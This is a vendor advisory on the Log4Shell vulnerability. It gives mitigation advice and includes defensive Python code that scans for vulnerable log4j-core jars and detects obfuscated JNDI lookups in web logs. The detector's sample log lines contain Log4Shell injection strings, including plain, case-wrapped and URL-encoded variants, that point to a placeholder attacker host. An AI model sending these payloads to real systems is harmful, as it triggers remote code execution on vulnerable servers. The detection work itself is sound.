Recommendations for Apache Log4J 2 Vulnerability

Apache Log4j 2 vulnerability

A critical vulnerability has been found in Log4j 2, a popular Apache Java-based logging library. Log4j is used in many Java applications and ships by default with many enterprise applications, IT management systems, and over 400,000 open-source projects. This is a critical vulnerability that is being actively exploited by threat actors across the globe. GDT strongly recommends that you analyze your current environment, evaluate mitigations, configure protections, and upgrade vulnerable systems as quickly as your business operations allow.

The vulnerability, known as Log4Shell, allows an attacker to execute code remotely on the target host. Many Java-based applications use log4j as their logging utility and are vulnerable, which makes this one of the most widely exposed and easily exploited vulnerabilities in recent years.

Current CVEs:

  • CVE-2021-44228
  • CVE-2021-45046
  • CVE-2017-5645
  • CVE-2019-17571

GDT’s Recommendations

Identify vulnerable systems:

  • Identifying the vulnerable systems already in your environment is a key step in protecting and patching them. This can be a significant effort, but it is essential to a successful response. Existing inventory management and software lifecycle management systems will aid in this effort. Security researchers have also made scanning tools freely available. As with many events like this, attackers know organizations will be scrambling for these tools and may embed malware in scanners and post them on the web, so it is vital that you obtain any scanning tool from a trusted source.
  • Many IT infrastructure systems use Apache and Java for their management interfaces, so it is important to include IT systems in the discovery. This includes network management systems, IP phone systems, video surveillance management systems, information security systems, etc.

Application and API inspection:

  • From an edge or transit network perspective, next-generation firewalls and web application inspection services can detect and block these types of attacks. One key prerequisite is that SSL/TLS inspection is enabled on existing next-generation firewalls and web application inspection services; otherwise the lookup string passes them inside encrypted traffic and is never seen. For cloud-based services, API security rules can be deployed using many of the cloud security tools available from our partners. Host technology such as XDR can detect and block this attack today, so ensuring that servers, endpoints, and management systems are actively using a managed XDR solution significantly reduces the risk associated with these types of attacks.

Application policy enforcement:

  • Assess and/or develop application allow-listing (whitelisting) policies on next-generation firewalls for key corporate applications, to block suspicious traffic and remote calls to unexpected applications or servers. Note: using application server firewalls to prevent unexpected communication between applications is recommended.

Java recommendations:

  • Disable JNDI, if possible, within your log4j deployment. This may be a complex task given development and application dependencies, but it can be a good interim compensating control when other options are not available.

Patching options:
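The two recommendations that involve the most hands-on work are the discovery step (find every copy of log4j-core, including the ones bundled inside application wars and ears) and the JNDI recommendation (Apache's documented interim mitigation for releases without the fix is to delete JndiLookup.class from log4j-core). The Python below is an added example written for this page; it is not GDT's tooling and not an Apache tool. It walks a directory tree, reads the version out of each log4j-core manifest, recurses into nested archives, flags copies that still carry JndiLookup.class, and produces a stripped copy of a flagged top-level jar. The jars it scans are constructed stand-ins built in a temporary directory (a manifest plus a few fake class entries, not real Log4j code). The flagging rule, "below 2.16.0 with JndiLookup.class present", is an assumption of this example: 2.16.0 removed the lookup, but the Java 7 backport line (2.12.2 and later) is also fixed and is not modelled here, so treat the output as a worklist for review rather than a verdict.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Class that implements the JNDI lookup inside log4j-core.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Assumption of this example: flag anything below 2.16.0 that still ships
# JndiLookup.class. The 2.12.2+ Java 7 backport is also fixed and is not modelled.
FIXED_VERSION = (2, 16, 0)


def _parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing or odd version parses as (0, 0, 0), i.e. suspect."""
    parts = [int(p) for p in re.findall(r"\d+", text or "")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def _manifest_version(zf):
    """Read Implementation-Version from the jar manifest, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
    return m.group(1) if m else None


def inspect_archive(zf, label, results):
    """Record any log4j-core found in zf, then recurse into archives bundled inside it."""
    names = zf.namelist()
    if any(n.startswith("org/apache/logging/log4j/core/") for n in names):
        version = _manifest_version(zf)
        jndi_present = JNDI_CLASS in names
        results.append({"archive": label, "version": version, "jndi_present": jndi_present,
                        "flagged": jndi_present and _parse_version(version) < FIXED_VERSION})
    for n in names:
        if n.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(n)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{label}!/{n}", results)   # "outer!/inner" naming
    return results


def scan_tree(root):
    """Walk a directory tree and return one finding per log4j-core copy located."""
    results = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_EXT:
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, str(path), results)
            except zipfile.BadZipFile:
                continue
    return results


def strip_jndi_lookup(src_jar, dst_jar):
    """Write a copy of src_jar without JndiLookup.class; True if the class was present."""
    removed = False
    with zipfile.ZipFile(src_jar) as src, zipfile.ZipFile(dst_jar, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))
    return removed


def build_fixture(root):
    """Constructed stand-ins for real jars: a manifest and a few fake class entries."""
    root = Path(root)

    def make_jar(path, version):
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")

    make_jar(root / "log4j-core-2.14.1.jar", "2.14.1")   # pre-fix release, loose on disk
    make_jar(root / "log4j-core-2.17.1.jar", "2.17.1")   # fixed release
    make_jar(root / "inner.jar", "2.13.3")               # pre-fix copy bundled inside a war
    with zipfile.ZipFile(root / "app.war", "w") as war:
        war.write(root / "inner.jar", "WEB-INF/lib/log4j-core-2.13.3.jar")
    (root / "inner.jar").unlink()


def demo(root):
    """Scan, strip JndiLookup.class from flagged top-level jars, and rescan."""
    build_fixture(root)
    before = scan_tree(root)
    for f in before:
        if f["flagged"] and "!/" not in f["archive"]:   # nested copies need the outer war rebuilt
            src = Path(f["archive"])
            strip_jndi_lookup(src, src.with_name(src.stem + "-nojndi.jar"))
            src.unlink()
    return before, scan_tree(root)


def demo_in_tempdir():
    with tempfile.TemporaryDirectory() as tmp:
        return demo(tmp)
```

Running demo_in_tempdir() returns the findings before and after the strip: the loose 2.14.1 jar and the 2.13.3 copy inside app.war are flagged initially, the 2.17.1 jar is not, and after the strip only the nested copy remains flagged, because a class cannot be removed from a jar inside a war without repackaging the war. That leftover is the point of the "!/" labels: a finding inside a deployed application is an application owner's fix, not a file-system edit.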
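The edge and host inspection recommendation above relies on the firewall, WAF or XDR agent recognizing the JNDI lookup string in request data before Log4j evaluates it. Log4j's own lookup syntax can wrap that string, and a request can arrive URL-encoded, so a detector that matches the literal text alone misses traffic that a normalizing detector catches. The Python below is an added example, not GDT's or any vendor's detection code: it URL-decodes, repeatedly resolves the wrapper lookups from the inside out, and only then matches. The log lines are constructed in web-server access-log shape, the hostnames are placeholders on the reserved .invalid domain, and the set of wrappers resolved (lower, upper and the `:-` default-value form) is an assumption about the common forms rather than a complete list.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What remains once the wrapping has been peeled off.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate the lookups that can wrap a payload; leave every other lookup untouched."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${name:-default}: an undefined name yields its default
        return body.split(":-", 1)[1]
    return match.group(0)                 # e.g. ${jndi:...} or ${env:HOME}: keep as written


def normalize(text, max_rounds=32):
    """URL-decode, then resolve inner lookups until the string stops changing."""
    text = unquote(text)                  # %24%7B -> ${
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_attempt(line):
    return _JNDI.search(normalize(line)) is not None


def scan_logs(lines):
    """Indexes of the lines that carry a JNDI lookup, for routing to the SOC."""
    return [i for i, line in enumerate(lines) if is_jndi_attempt(line)]


# Constructed sample access-log lines; hosts use the reserved .invalid domain.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example.invalid/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:rmi://attacker.example.invalid/b}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] '
    '"GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/${env:HOME} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for i in scan_logs(SAMPLE_LOGS):
        print("JNDI lookup in line", i, "->", normalize(SAMPLE_LOGS[i]))
```

The normalization step is what separates a useful rule from a brittle one: lines 1 to 3 of the sample set are the same lookup written three ways, and only the decoded, unwrapped form is matched. The final line carries a lookup that is not JNDI and is left alone, which keeps the rule from alerting on every `${...}` that passes through a log.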

Contact GDT: 

GDT has experts on staff who are actively helping our clients identify and patch their systems, enable SSL inspection, mature their security posture, and get the most out of their existing security tools. Contact GDT for more details and to schedule a call with our expert Solutions Architects.
